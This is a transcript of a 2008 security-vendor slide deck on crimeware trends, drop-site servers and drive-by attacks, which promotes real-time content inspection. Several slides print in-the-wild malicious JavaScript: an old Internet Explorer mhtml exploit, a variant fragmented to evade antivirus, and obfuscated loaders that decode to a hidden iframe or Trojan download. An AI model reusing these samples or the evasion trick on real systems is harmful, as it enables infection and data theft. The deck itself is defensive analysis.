Mitigating Malware Presentation Jkd 11 10 08 Aitp


Published on

Windy City AITP Presentation 11 10 2008 on current trends in malware and how to mitigate the growing threat

Published in: Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • This is a product presentation You should use this presentation after explaining Finjan’s value proposition and company background If you need some slides to better explain the problem, use the MCRC presentation
  • Mitigating Malware Presentation Jkd 11 10 08 Aitp

    1. 1. Chicago AITP – November 10, 2008 Devising a Strategy to Mitigate Malware Joann K. Davis (O) 847.304.1892 (C) 847.769.3018 [email_address]
    2. 2. This presentation may contain images of websites which have been found to have served web content with embedded crimeware. The depicted reputable websites are NOT part of the crimeware problem described herein. They are in fact targets and victims of the new and sophisticated schemes employed by criminals in the distribution of crimeware that we see emerging today. This presentation uses Finjan as an EXAMPLE of Proactive Web Content Inspection technology and the MCRC as an EXAMPLE of Security Vendor research labs. Disclaimers
    3. 3. <ul><li>Crimeware Trends </li></ul><ul><ul><li>Anatomy of a Crimeware Server </li></ul></ul><ul><ul><li>Data targeted for theft </li></ul></ul><ul><ul><li>90% on Legit Sites </li></ul></ul><ul><li>Case Studies: Drive-by Attacks </li></ul><ul><li>Web Security Technologies </li></ul><ul><li>Web Security Resources </li></ul>Agenda
    4. 4. <ul><li>Trends In Crimeware </li></ul>
    5. 5. McAfee : the number of keyloggers increased by 250% between January 2004 and May 2006. Phishing attacks increased by 100% only. Symantec : 4.7 million distinct computers are actively used in botnets to spit out spam, launch DoS (denial of service) attacks, install malware or log keystrokes for identity theft Sophos : Researchers are finding 29,700 new infected Web pages every day, and 80% of them are legitimate sites that have been compromised Microsoft : the Malicious Software Removal Tool (MSRT) has removed at least one Trojan from about 3.5 million unique computers. Of the 5.7 million infected Windows machines, about 62 percent was found with a Trojan or bot FBI : Over One Million victim computers are being actively used for botnets. Growth of Cybercrime Source: AV-Test Labs
    6. 6. Cybercrime Survey Results <ul><li>91% perceive cybercrime as major business risk </li></ul><ul><li>73% of CIOs/CSOs view data theft as main risk vs downtime </li></ul><ul><li>68% feel IP is at risk </li></ul><ul><li>25% know data was breached </li></ul><ul><li>42% think data MAY have been breached </li></ul><ul><li>67% would like to deploy more proactive content inspection technology </li></ul>
    7. 7. <ul><li>Recent Trends in Crimeware Development </li></ul><ul><li>Crimeware as a Service </li></ul><ul><ul><li>Ready to Use Exploit Packs </li></ul></ul><ul><ul><li>Central Management </li></ul></ul><ul><ul><li>Buying and Selling Stolen Information </li></ul></ul><ul><li>Mafia-like structure </li></ul><ul><li>Encrypted Malware </li></ul><ul><li>PDF, GIF, Flash </li></ul>Recent Trends
    8. 8. Evolution of obfuscation
    9. 9. A Recent Attack In April 2008, Finjan’s MCRC discovers a Server being utilized for Criminal purposes in Malaysia. Managing the Deployment and Execution of Crimeware (AdPack) on Infected Machines. <ul><li>Email and Chat </li></ul><ul><ul><li>Corporate/Private Webmail Credentials </li></ul></ul><ul><ul><li>Message Content </li></ul></ul><ul><ul><li>Chat Sessions </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>Personal Health Information </li></ul><ul><ul><li>Name, Address, Phone </li></ul></ul><ul><ul><li>SSN </li></ul></ul><ul><ul><li>Prescription </li></ul></ul><ul><ul><li>Insurance </li></ul></ul><ul><ul><li>Medical Conditions </li></ul></ul><ul><ul><li>Physician Information </li></ul></ul><ul><ul><li>Online Credentials </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>Online Banking </li></ul><ul><ul><li>Access Credentials </li></ul></ul><ul><ul><li>Accounts </li></ul></ul><ul><ul><li>Balances </li></ul></ul><ul><ul><li>Credit Card Info </li></ul></ul><ul><ul><li>Mother’s Maiden Name </li></ul></ul><ul><ul><li>… </li></ul></ul>In addition, the Server was also being utilized as a Data Aggregation Point or ‘ Drop Site ’ capturing the contents of web-based transactions. The Server was acting as a Command and Control Center…
    10. 10. Anatomy of a ‘Drop-Site’ Server Review Stolen Information via Web Interface – Command and Control Attack Campaigns target specific groups, regions, and type of data. Logs are grouped by Country. Data is gathered as text and graphic images.
    11. 11. Web-Based Command And Control Execute Commands Against Infected User Machines.
    12. 12. Transaction Details <ul><li>Timestamp:28.02.2008 8:16:20------[https:// /login] </li></ul><ul><li>UserName=KEYLOGGED:???????? KEYSREAD:???????? </li></ul><ul><li>[https:// /] </li></ul><ul><li>Password=KEYLOGGED:???????? KEYSREAD:???????? </li></ul><ul><li>[https:// /] </li></ul><ul><li>User Login </li></ul><ul><li>Action=LOGIN </li></ul><ul><li>TimeZoneOffset=300 </li></ul><ul><li>Browser=IE6 </li></ul><ul><li>StationInfo= </li></ul><ul><li>UserName=???????? </li></ul><ul><li>Password=???????? </li></ul><ul><li>SSN1=### </li></ul><ul><li>SSN2=## </li></ul><ul><li>SSN3=#### </li></ul><ul><li>HomePhone=########## </li></ul><ul><li>------IP=###.###.125.85 </li></ul><ul><li>ID=2112####_04####2_12####937 </li></ul>Date and Time of Transaction and Domain being accessed. Input Keyed in by User. Username and Passwords are often clearly identifiable. Form data unique to each transaction request. May include information such as Social Security, Phone Numbers, etc. IP Address of the user’s machine. i.e. the infected machine.
    13. 13. What Is Being Harvested? <ul><li>Email Content </li></ul><ul><li>Instant Messaging Dialogs </li></ul><ul><li>Protected Health Information (HIPAA Administrative Simplification Provision) </li></ul><ul><li>Bank Accounts </li></ul><ul><li>Outlook Accounts </li></ul><ul><li>Citrix TM Logins </li></ul><ul><li>FTP Logins </li></ul><ul><li>Business Data </li></ul><ul><li>Network Data </li></ul><ul><li>Tax Information </li></ul><ul><li>Identity Information </li></ul>
    14. 14. Harvested Data: Full Screen Capture Actual Screenshots Logged to Crimeware Server
    15. 15. <ul><li>Timestamp:28.02.2008 0:13:53------[https://portal.?????.org/ Citrix /AccessPlatform/auth/login.aspx] </li></ul><ul><li>user =KEYLOGGED:###### KEYSREAD:###### </li></ul><ul><li>[https://portal.?????.org/Citrix/AccessPlatform/auth/login.aspx] </li></ul><ul><li>password =KEYLOGGED:?????? KEYSREAD:?????? </li></ul><ul><li>[https://portal.?????.org/Citrix/AccessPlatform/auth/login.aspx] </li></ul><ul><li>Web Interface Log In </li></ul><ul><li>LoginType=Explicit </li></ul><ul><li>user=###### </li></ul><ul><li>password=?????? </li></ul><ul><li>submitMode=submit </li></ul><ul><li>slLanguage=en </li></ul><ul><li>------IP=6#.2##.1##.1## </li></ul><ul><li>ID=07122007_041727_91794082 </li></ul>No Data Is Safe Citrix TM Login Credentials Logon Credentials to Applications and Systems are compromised.
    16. 16. <ul><li>Timestamp:23.02.2008 13:25:40------[https://webmail.???.com/exchweb/bin/auth/owalogon.asp?url=https://webmail.???.com/exchange%26reason=0] </li></ul><ul><li>username =KEYLOGGED:???????? KEYSREAD:???????? </li></ul><ul><li>[https://webmail.???.com/exchweb/bin/auth/owalogon.asp?url=https://webmail.???.com/exchange%26reason=0] </li></ul><ul><li>password =KEYLOGGED:???????? KEYSREAD:???????? </li></ul><ul><li>[https://webmail.???.com/exchweb/bin/auth/owaauth.dll] </li></ul><ul><li>Microsoft Outlook Web Access </li></ul><ul><li>destination=https%3A%2F%2Fwebmail.???.com%2Fexchange </li></ul><ul><li>flags=0 </li></ul><ul><li>username=???????? </li></ul><ul><li>password=???????? </li></ul><ul><li>SubmitCreds=Log+On </li></ul><ul><li>forcedownlevel=0 </li></ul><ul><li>trusted=0 </li></ul><ul><li>------IP=6#.2##.1##.1## </li></ul><ul><li>ID=08022008_171207_94338234 </li></ul>No Data Is Safe Hospital Outlook Web Access (OWA) Logon Credentials Corporate Mail accounts are not Immune.
    17. 17. <ul><li>Timestamp:05.03.2008 19:52:54------[http://sw?????????????????/ResidentNotesAction.cfm] </li></ul><ul><li>Check Out Sheets </li></ul><ul><li>Action=Update </li></ul><ul><li>Team=??????? </li></ul><ul><li>RmMDService=#### </li></ul><ul><li>MD=?????? </li></ul><ul><li>Service=???????? </li></ul><ul><li>PatientName =??????, ?????? </li></ul><ul><li>MRN=###### </li></ul><ul><li>Age=##y </li></ul><ul><li>WT=### </li></ul><ul><li>Diagnosis= Admitted for IV abx 2 nd spinal rod infection. Hx of SMA, wheelchair bound, on bipap c back up rate ESR increased. Ctx neg. Not getting meds at home. Will need 42 days abx. Blood cx … Started on ceftazidime 3-5. </li></ul><ul><li>MEDS=Clindamycin, Miralax, ciproheptadine </li></ul><ul><li>TODO=f u Blood cx and CBC at 2100 </li></ul>No Data Is Safe Email - Patient History Confidential patient information freely available.
    18. 18. <ul><li>Timestamp:29.02.2008 21:53:16------[https://???????????] </li></ul><ul><li>username =KEYLOGGED:???????? KEYSREAD:????????? </li></ul><ul><li>[https://web.??????????] </li></ul><ul><li>password =KEYLOGGED:???????? KEYSREAD:???????? </li></ul><ul><li>[https://web.???????????????/login2/login.jsp] </li></ul><ul><li>Bank Online - Sign On </li></ul><ul><li>next_page= </li></ul><ul><li>username=???????? </li></ul><ul><li>maxUsernameLength=50 </li></ul><ul><li>password=???????? </li></ul><ul><li>maxPasswordLength=50 </li></ul><ul><li>------IP= </li></ul><ul><li>ID=25122007_171638_68593 </li></ul>No Data Is Safe Online Banking A common target – online banking signon credentials.
    19. 19. Value Depends Upon Who and Where You Are
    20. 20. Web Attacker Toolkits Toolkits Bring Hacking to the Masses Monitor the Success of Your Campaigns
    21. 21. Example of pay-per-infection
    22. 22. Crimeware Where You Least Expect It
    23. 23. Malicious Websites by Category Challenges Traditional URL Filtering
    24. 24. <ul><li>Case Studies </li></ul><ul><li>2 Drive-By Attacks </li></ul>
    25. 25. A Drive-By Attack An Innocent Free Game Website Simply visit this site to get infected. There is no need to click a link, download or install any software (at least that you are aware of).
    26. 26. A Drive-By Attack An Innocent Free Game Website Exploits our desktop to install a Trojan
    27. 27. A Drive-By Attack Each user session receives a different signature for the same exploit Dynamic Code Obfuscation
    28. 28. <ul><li>The two sites below are legitimate, but when browsing to them, the victim is being attacked by a script served from the sites themselves (as opposed to a reference to another server hosting the malware). </li></ul> Serves Up A Drive-by Infection
    29. 29. <ul><li>The malicious script is embedded in the HTML code of the site. </li></ul><ul><li>The script name is a randomly generated 5 letter javascript file, which is being served only once per visitor (controlled by the server). </li></ul> Malicious Script Analysis HTML code from the Berkeley site on January 25 th
    30. 30. <ul><li>The script itself is obfuscated to circumvent Anti-virus signature detection mechanisms </li></ul> Malicious Script Analysis
    31. 31. <ul><li>De-obfuscating the code reveals the following 19 exploits in the malicious script: </li></ul><ul><ul><li>DirectAnimation ActiveX Controls Memory Corruption Vulnerability </li></ul></ul><ul><ul><li>IE7 DoS vulnerability </li></ul></ul><ul><ul><li>AOL SuperBuddy ActiveX Control Code Execution Vulnerability </li></ul></ul><ul><ul><li>NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow </li></ul></ul><ul><ul><li>Yahoo Messenger CYFT Object Arbitrary File Download Vulnerability </li></ul></ul><ul><ul><li>IE Malicious Shortcut Self-Executing HTML Vulnerability </li></ul></ul><ul><ul><li>IE Self-Executing HTML Arbitrary Code Execution Vulnerability </li></ul></ul><ul><ul><li>IE Shell.Application Object Script Execution Vulnerability </li></ul></ul><ul><ul><li>IE RDS ActiveX Vulnerability </li></ul></ul><ul><ul><li>RDS Cross Zone Scripting Vulnerability </li></ul></ul><ul><ul><li>IE WMIScriptUtils createObject vulnerability </li></ul></ul><ul><ul><li>IE WebViewFolderIcon vulnerability </li></ul></ul><ul><ul><li>IE createObject vulnerability </li></ul></ul><ul><ul><li>File Write </li></ul></ul><ul><ul><li>Generic Shellcode detection </li></ul></ul><ul><ul><li>Create Process </li></ul></ul><ul><ul><li>Access Potentially Dangerous Applications </li></ul></ul><ul><ul><li>Access Microsoft Outlook </li></ul></ul><ul><ul><li>Dangerous ActiveX Objects Remote Creation Protection, Remote File Read and Execution Protection </li></ul></ul> What the Code Does
    32. 32. <ul><li>The victim machine is infected with a Crimeware Trojan that focuses on data theft . </li></ul> Trojan Traffic Analysis Communication recorded after infection includes sending of local data
    33. 33. <ul><li>How will Web Reputation Services rate this site? </li></ul>
    34. 34. <ul><li>This Attack Is Not Blocked with a Neutral Rating </li></ul> Reputation-based Security
    35. 35. <ul><li>How will URL Filtering databases rate this site? </li></ul>
    36. 36. Categorization by URL Filtering Not Categorized as Malicious
    37. 37. Example of Malware using Fragmentation Original malicious page found in the wild Exploiting a well-known exploit of Internet Explorer described on: CVE-2004-0380 and MS04-013 Exploit <html><head></head> <body> <script> try{ document.write('<object data=&quot;&#'+109+';s-its:mhtml'+':'+'file://C:osuch.mht! ::/target.htm&quot; type=&quot;text/x-scriptlet&quot;></object>'); catch(e){} </script></body></html>
    38. 38. Detected by some AV Engines 9 out of 29 Anti-viruses successfully detected the known malicious code (
    39. 39. Basic Code Modification Techniques Original malicious page found in the wild – “modified” Without changing the malicious code exploiting IE, we added a simple Javascript command that just add a dummy string. Will the Anti-Virus detect the malicious code….? Added string Fragmented string <html><head></head> <body <script> try{ document.write(‘dummy string’); document.write('<object data=&quot;&#'+109+';s-its:m' + 'h' + 't' + 'ml'+':'+'fi' + 'le://C:osuch.m' + + 'ht! ::/target.htm&quot; type=&quot;text/x-scriptlet&quot;></object>'); catch(e){} </script></body></html>
    40. 40. Circumnavigates Signatures and Heuristics 0 out of 29 Anti-viruses detected the known malicious code (
    41. 41. How Does It Work? Finjan Vital Security TM NG <script> Document.write(“ BAD ”); </script> <script> Document.write(“ BA ” + “ D ”); </script> URL Filter Anti- Virus “ BAD ” Internet “ ” Real-time Content Inspection Real-time content inspection technology determines the intent of the script and does not depend upon signatures or reputation of source. Crimeware is embedded in the web page, often unknown to even source servers of high reputation. Malicious code is blocked at the gateway protecting your system from harm. An employee points his browser to “” . For business productivity reasons, this site may be blocked. An employee points her browser to “” . AV software performs a database scan to match signatures of known malicious code. In this case, a match is found. Crimeware, even the still unknown threat, is blocked at the gateway protecting your system from harm. Just seconds later, a request to the same server eludes traditional signature-based detection via dynamic obfuscation techniques. Simple string fragmentation and code obfuscation techniques are used to evade signature-based protection mechanisms. By deconstructing the code to its constituent algorithms, scanner determines the mobile code’s true intent.
    42. 42. Life Without Content Inspection Finjan Vital Security TM NG URL Filter Anti- Virus “ BAD ” Internet “ ” Real-time Content Inspection <script> Document.write(“ BA ” + “ D ”); </script> Crimeware has infiltrated your environment. It executes with the same level of authorization as the user who accessed the infected web page. What information is available to that person and now the crimeware? Personnel Information Account Information Intellectual Property Trade Secrets Customer Information Userids/Passwords Financial Reports Customer Lists Payroll Data … Is this Information valuable to you? What could happen without scanning?
    43. 43. Multi-Tiered Protection URL/Reputation Anti-Virus Real-time Content Inspection
    44. 44. Reactive vs. Proactive Conventional Products Protect Against Known Attacks FW , AV, IPS / IDS, URL Next Generation Real-Time Content Inspection Java applet HTML EXE Java Script VB Script ActiveX Mobile Code Layer
    45. 45. Proactive Scanning Technologies <ul><li>Heuristics </li></ul><ul><li>Spyware Scanning </li></ul><ul><li>Known Vulnerability Exploit Scanning </li></ul><ul><li>De-encryption of SSL </li></ul><ul><li>De-obfuscation </li></ul><ul><li>Deconstruction of web code </li></ul><ul><li>Sandbox techniques </li></ul>
    46. 46. Web Security Violation Breakdown – Sample Audit Block Access to Spyware Sites Block Application Level Vulnerabilities Block Malicious Scripts by Behavior Block Malicious ActiveX, Java Applets and Executables Block Binary Exploits in Textual Files Block Known Viruses (Kaspersky) White List No Behavior Based Scanning Block Files with Suspicious Multiple Extensions Block Access to Blacklisted URLs Block Spoofed Content Block Potentially Malicious Archives Block Binary Objects with Invalid Digital Certificate Block Microsoft Office Documents containing Macros and/or Embedded Files Block Access to Adware Sites Block IM Tunneling 14,897 8,344 2,500 967 846 781 500 487 392 303 201 168 104 4 1
    47. 47. Example - Malicious Behavior Detected behavior: Obfuscated Script URL: Code Sample <body>< script>function xy1q487ded85e3648(q487ded85e3e18){ return (parseInt(q487ded85e3e18,16));}function q487ded85e5588(q487ded85e5d59){ var q487ded85e652f='';q487ded85e846c=String.fromCharCode;for(q487ded85e6cf7=0;q487ded85e6cf7<q487ded85e5d59.length;q487ded85e6cf7+=2){ q487ded85e652f+=(q487ded85e846c(xy1q487ded85e3648(q487ded85e5d59.substr(q487ded85e6cf7,2))));}return q487ded85e652f;} var q487ded85e8c35='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533322533312533302533362533382532392532622532372536332536332536322533372533382536352533372532372532302537372536392536342537342536382533642533342533362532302536382536352536392536372536382537342533642533342533352533382532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q487ded85e5588(q487ded85e8c35));</script> <table width=&quot;790&quot; border=&quot;0&quot; align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;> Impact: Attempts to download a Trojan to the desktop (Trojan-Downloader.JS.Agent.ciw )
    48. 48. Malware Example – File Create URL: Code Sample n = external.menuArguments; var wsh = new ActiveXObject (&quot;WScript.Shell&quot;); var fso = new ActiveXObject(&quot; Scripting.FileSystemObject &quot;); var tempfolder = fso.GetSpecialFolder(2); var filename = tempfolder.path + &quot;amp;quot; + fso.GetTempName(); var file Impact: The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.
    49. 49. Malware Example – File Write URL: Code Sample heckDocument() { oShell= new ActiveXObject(&quot;WScript.Shell&quot;); oShell.SendKeys( &quot;^c&quot; ); // copy oWord = new ActiveXObject (&quot;Word.Application&quot;); oWord.Documents.Add(); oWord.Selection.Paste(); oWord.ActiveDocument.CheckSpelling(); oWord.Selec Impact: The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.
    50. 50. Malware Example – File Query URL: Code Sample veXObject(&quot;WScript.Shell&quot;); var fso = new ActiveXObject (&quot; Scripting.FileSystemObject &quot;); var tempfolder = fso. GetSpecialFolder (2); var filename = tempfolder.path + &quot;amp;quot; + fso.GetTempName(); var file = fso.CreateTextFile(filename, true, true); fi Impact: The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.
    51. 51. Malware Example – Create Process URL: Code Sample heckDocument() { oShell= new ActiveXObject(&quot; WScript.Shell &quot;); oShell.SendKeys( &quot;^c&quot; ); // copy oWord = new ActiveXObject(&quot;Word.Application&quot;); oWord.Documents.Add(); oWord.Selection.Paste(); oWord.ActiveDocument.CheckSpelling(); oWord.Selec Impact: The WSript.Shell object provides functions to run a program locally, manipulate the contents of the registry, create a shortcut, access to system folder and environment variables, work with the registry and manage shortcuts. By using this object the end-user machine is compromised.
    52. 52. Malware Example – Clipboard Vulnerability Detected behavior: IE Unauthorized Clipboard Contents Disclosure Vulnerability URL: Code Sample else if (cmdID.toLowerCase() == ' paste ') { editdoc. execCommand ('Paste'); var str=editdoc.body. createTextRange ().htmlText; if (str.indexOf(&quot;; mso-&quot;)>=0 ||str.indexOf(&quot;<v:&quot;)>=0 ||str.indexOf('class=&quot;Mso')>=0){ myclean(editdoc); } editdoc.body.innerHT Impact: This vulnerability could permit scripting operations to gain access to clipboard contents. This issue employs the execCommand('Paste') method to copy clipboard contents into small (or hidden) textarea. In this manner, security checks performed by the browser are bypassed and the clipboard contents will be copied.
    53. 53. Malware example - iframe <ul><li>URL: </li></ul><ul><li>  </li></ul><ul><li>Start with: </li></ul><ul><li>  <script language = &quot;javascript&quot;>function monkey(s){ </li></ul><ul><li>var s1=unescape(s.substr(0,s.length)); var t=''; </li></ul><ul><li>for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)+7); </li></ul><ul><li>document.write(unescape(t)); </li></ul><ul><li>}; </li></ul><ul><li>monkey('%35%4C%5C%6B%62%69%6D%19%45%5A%67%60%6E%5A%60%5E%36%20%43%5A%6F%5A%6C%5C%6B%62%69%6D%20%37%5D%68%5C%6E%66%5E%67%6D%27%70%6B%62%6D%5E%21%6E%67%5E%6C%5C%5A%69%5E%21%20%1E%2C%3C%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%1E%2F%2E%1E%2B%29%1E%30%2C%1E%30%2B%1E%2F%2C%1E%2C%3D%1E%2B%2B%1E%2F%31%1E%30%2D%1E%30%2D%1E%30%29%1E%2C%3A%1E%2B%3F%1E%2B%3F%1E%30%3A%1E%2C%30%1E%2D%2A%1E%2E%29%1E%2D%3E%1E%2B%3E%1E%2F%2D%1E%2D%2A%1E%2F%30%1E%2D%3F%1E%2E%2D%1E%2F%31%1E%2B%3E%1E%2F%32%1E%2D%3E%1E%2B%3F%1E%2B%2B%1E%2B%29%1E%30%30%1E%2F%32%1E%2F%2D%1E%30%2D%1E%2F%31%1E%2C%3D%1E%2C%29%1E%2B%29%1E%2F%31%1E%2F%2E%1E%2F%32%1E%2F%30%1E%2F%31%1E%30%2D%1E%2C%3D%1E%2C%29%1E%2C%3E%1E%2C%3C%1E%2B%3F%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%1E%2F%2E%1E%2C%3E%20%22%22%34%35%28%6C%5C%6B%62%69%6D%37'); </script> </li></ul><ul><li>  </li></ul><ul><li>Decode to: </li></ul><ul><li>  <Script Language='Javascript'>document.write(unescape('< iframe src=&quot;http://z7APN.dAgOTh.iN/&quot; width=0 height=0></iframe>')) ;</script> </li></ul><ul><li>  </li></ul><ul><li>Iframe with a random name, URL is not available currently to analyze </li></ul>
    54. 54. Example of Potentially Malicious Behavior Detected behavior: IE Shell.Application Object Script Execution Vulnerability URL: Code Sample lbEFl0X].substring(1,z1IlbpFl0X[z1IlbEFl0X].length-1));if(z1IlbFFl0X){try{varz1IlcvFl0X=x0r1aW2Z(z1IlbFFl0X,&quot; Shell.Application &quot;);if(z1IlcvFl0X){z1IlctFl0X=z1IlEFl0X(z1IlbFFl0X);returnz1IlctFl0X;}}catch(e){}}z1IlbEFl0X++;}returnfalse;} Malicious Behavior: The Shell object represents the objects in the Windows Shell. This object expose methods which provides abilities to: Open, explore, and browse for folders; Minimize, restore, cascade, or tile open windows; Launch Control Panel applications; Display system dialog boxes. By using this object, the end-user machine is compromised.
    55. 55. <ul><li>Sophos Threat Report 7/08 – 90% of malware is hosted on legitimate sites </li></ul><ul><li>Are you serving Crimeware? </li></ul>
    56. 56. Web Monitor module The results of the scan (“ok” or “bad”) are returned to the Web Monitor module where next step processing may include notifying Administrators via Email of the discovery of malicious content on your website. Finjan Vital Security TM NG plus Anti-Virus A Web Monitor Module is configured to automatically scan web pages served by your company. If these pages are found to have been compromised by malicious content, an alert will be sent. Note: the Web Monitor module is custom code . The Web Monitor Module issues an HTTP GET request for every URL your company serves or only those you wish to scan. Besides being able to monitor the uptime and response time of your web servers, it will scan for crimeware. Using a combination of Anti-Virus and real-time content inspection technologies, the page is scanned for malicious content… Monitoring Your Web Servers
    57. 57. Web Gateway Security Resources <ul><li>Security Vendor Research sites & blogs </li></ul><ul><li>US Government Security Sites </li></ul><ul><li>Security Industry Organization Sites </li></ul><ul><li>Industry Media Sites & blogs </li></ul><ul><li>Books & Publications </li></ul>
    58. 58. Vendor Sites <ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul>
    59. 59. Example of Vendor Resources
    60. 60. Example of Vendor Blog
    61. 61. Government Security Sites <ul><li> </li></ul><ul><li> (Secret Service - CECTF) </li></ul><ul><li> - </li></ul><ul><li> – Dept of Justice </li></ul>
    62. 62. Security Industry Sites <ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul>
    63. 63. Industry Media Sites <ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul>
    64. 64. Industry Media Sites <ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul>
    65. 65. Industry Blogs <ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul>
    66. 66. Books & Publications <ul><li>Googling Security: How Much Does Google Know About You? - Greg Conti – 2009 – Addison Wesley </li></ul><ul><li>Crimeware – Markus Jakobsson & Zulfikar Ramzan – 4/08 </li></ul><ul><li>Schneier on Security – Bruce Schneier – 9/08 - Wiley </li></ul>
    67. 67. Questions???